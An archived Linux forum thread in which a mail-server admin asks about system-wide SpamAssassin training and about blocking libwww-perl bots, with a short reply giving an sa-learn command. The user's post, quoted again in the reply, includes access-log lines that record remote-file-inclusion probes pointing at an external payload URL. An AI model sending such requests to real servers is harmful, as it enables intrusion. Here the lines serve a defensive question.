HowtoForge Forums | HowtoForge - Linux Howtos and Tutorials

HowtoForge Forums | HowtoForge - Linux Howtos and Tutorials (http://www.howtoforge.com/forums/index.php)
-   Server Operation (http://www.howtoforge.com/forums/forumdisplay.php?f=5)
-   -   Training SA & libwww-perl bots (http://www.howtoforge.com/forums/showthread.php?t=23685)

trashed 28th May 2008 11:27

Training SA & libwww-perl bots
 
Hi.
I have installed a mailserver following falko's tutorial for postfix+mysql+quota+courier but now I wanted to train spamassassin to have less FP's on the type of spam I am usually target of. I have already more than 3000 messages that are 100% spam & phishing.
Anyway, I googled around a bit but all I found was ways to train the filter on a per-user basis while I wanted to do it system-wide (so that SA will use that filter for every mailbox). How can I accomplish that?
(note: I am running amavis-new + SA)

Another problem I am currently having is the endless attacks from libwww-perl bots that scan my php scripts for vulnerabilities:

Code:

63.243.44.3 - - [28/May/2008:08:11:12 +0200] "GET /index.php/2008/05/?pd=http://www.digitalcosta.com/includes/PEAR/safeon.gif??????? HTTP/1.1" 200 4140 "-" "libwww-perl/5.79"
196.40.2.126 - - [28/May/2008:08:11:12 +0200] "GET /index.php/2008/05/?pd=http://www.digitalcosta.com/includes/PEAR/safeon.gif??????? HTTP/1.1" 200 4140 "-" "libwww-perl/5.65"


I read something around on how to block this type of user-agent but apache2 on debian has a split configuration and I'm not really sure how to implement this. Should I use the rules in every virtualhost that I am using?
If so, can I have an example?

falko 29th May 2008 18:47

Quote:

Originally Posted by trashed (Post 128139)
Hi.
I have installed a mailserver following falko's tutorial for postfix+mysql+quota+courier but now I wanted to train spamassassin to have less FP's on the type of spam I am usually target of. I have already more than 3000 messages that are 100% spam & phishing.
Anyway, I googled around a bit but all I found was ways to train the filter on a per-user basis while I wanted to do it system-wide (so that SA will use that filter for every mailbox). How can I accomplish that?
(note: I am running amavis-new + SA)

You could put all spam in one mailbox and then use a command like this:

Code:

sa-learn --no-sync [--spam or --ham] --mbox [folder]
Quote:

Originally Posted by trashed (Post 128139)
Another problem I am currently having is the endless attacks from libwww-perl bots that scan my php scripts for vulnerabilities:

Code:

63.243.44.3 - - [28/May/2008:08:11:12 +0200] "GET /index.php/2008/05/?pd=http://www.digitalcosta.com/includes/PEAR/safeon.gif??????? HTTP/1.1" 200 4140 "-" "libwww-perl/5.79"
196.40.2.126 - - [28/May/2008:08:11:12 +0200] "GET /index.php/2008/05/?pd=http://www.digitalcosta.com/includes/PEAR/safeon.gif??????? HTTP/1.1" 200 4140 "-" "libwww-perl/5.65"


I read something around on how to block this type of user-agent but apache2 on debian has a split configuration and I'm not really sure how to implement this. Should I use the rules in every virtualhost that I am using?
If so, can I have an example?

Take a look here: http://www.cyberciti.biz/tips/the-ri...bwww-perl.html


All times are GMT +2. The time now is 01:38.

Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2014, vBulletin Solutions, Inc.